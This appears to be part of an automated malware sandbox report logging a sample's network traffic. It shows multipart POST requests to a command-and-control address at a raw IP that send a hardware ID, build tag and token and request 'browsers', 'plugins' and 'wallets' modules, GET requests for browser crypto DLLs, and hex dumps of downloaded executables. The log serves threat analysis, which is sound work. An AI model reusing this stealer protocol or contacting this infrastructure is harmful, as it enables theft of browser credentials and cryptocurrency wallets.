06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 21 Oct 2024 06:47:29 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 08:49:08 GMTETag: "1f3950-5e7ea271b0900"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 21 Oct 2024 06:47:31 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 08:49:08 GMTETag: "3ef50-5e7ea271b0900"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 21 Oct 2024 06:47:31 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 08:49:08 GMTETag: "13bf0-5e7ea271b0900"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 147.45.44.221Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFBGHCAKKFCAKEBKJKKHost: 147.45.44.221Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 37 39 34 30 30 32 39 30 43 35 33 35 32 38 30 30 33 31 39 37 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6e 66 7a 65 6f 6e 77 63 69 74 75 63 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 2d 2d 0d 0a Data Ascii: ------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="hwid"D579400290C53528003197------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="build"nfzeonwcituc------DAFBGHCAKKFCAKEBKJKK--
Source: global traffic HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECBGIDAEHCGDGCBKEBGHost: 147.45.44.221Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 2d 2d 0d 0a Data Ascii: ------IECBGIDAEHCGDGCBKEBGContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------IECBGIDAEHCGDGCBKEBGContent-Disposition: form-data; name="message"browsers------IECBGIDAEHCGDGCBKEBG--
Source: global traffic HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIIIJDAAAAAAKECBFBAHost: 147.45.44.221Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 2d 2d 0d 0a Data Ascii: ------EHIIIJDAAAAAAKECBFBAContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------EHIIIJDAAAAAAKECBFBAContent-Disposition: form-data; name="message"plugins------EHIIIJDAAAAAAKECBFBA--
Source: global traffic HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAEGHIJEHJDHIDHIDAEHHost: 147.45.44.221Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 2d 2d 0d 0a Data Ascii: ------CAEGHIJEHJDHIDHIDAEHContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------CAEGHIJEHJDHIDHIDAEHContent-Disposition: form-data; name="message"fplugins------CAEGHIJEHJDHIDHIDAEH--
Source: global traffic HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIDBKKKKKFBGDGDHIDBHost: 147.45.44.221Content-Length: 5859Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3538548809da56b2/sqlite3.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJKJKKKJJJKJKFHJJJJEHost: 147.45.44.221Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECBGIDAEHCGDGCBKEBGHost: 147.45.44.221Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBKEHJJDAAAAKECBGHDAHost: 147.45.44.221Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 41 2d 2d 0d 0a Data Ascii: ------EBKEHJJDAAAAKECBGHDAContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------EBKEHJJDAAAAKECBGHDAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EBKEHJJDAAAAKECBGHDAContent-Disposition: form-data; name="file"------EBKEHJJDAAAAKECBGHDA--
Source: global traffic HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCFIDAFBFBAKFHJEGIJHost: 147.45.44.221Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 2d 2d 0d 0a Data Ascii: ------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="file"------EGCFIDAFBFBAKFHJEGIJ--
Source: global traffic HTTP traffic detected: GET /3538548809da56b2/freebl3.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3538548809da56b2/mozglue.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3538548809da56b2/msvcp140.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3538548809da56b2/nss3.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3538548809da56b2/softokn3.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3538548809da56b2/vcruntime140.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEHCGDBFCBAKECBKKEBHost: 147.45.44.221Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDHJEBFBFHJECAKFCAAHost: 147.45.44.221Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 2d 2d 0d 0a Data Ascii: ------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="message"wallets------GHDHJEBFBFHJECAKFCAA--
